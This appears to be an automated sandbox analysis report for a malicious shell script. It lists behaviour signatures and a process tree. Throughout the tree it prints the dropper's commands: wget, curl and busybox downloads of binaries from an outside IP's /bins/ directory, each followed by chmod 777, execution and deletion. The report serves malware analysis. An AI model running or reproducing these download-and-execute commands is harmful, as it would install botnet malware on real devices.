Analysis Overview
SHA256
a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f
Threat Level: Shows suspicious behavior
The file a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 07:29
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 07:29
Reported
2024-11-21 07:31
Platform
debian9-armhf-20240611-en
Max time kernel
51s
Max time network
54s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
Processes
/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
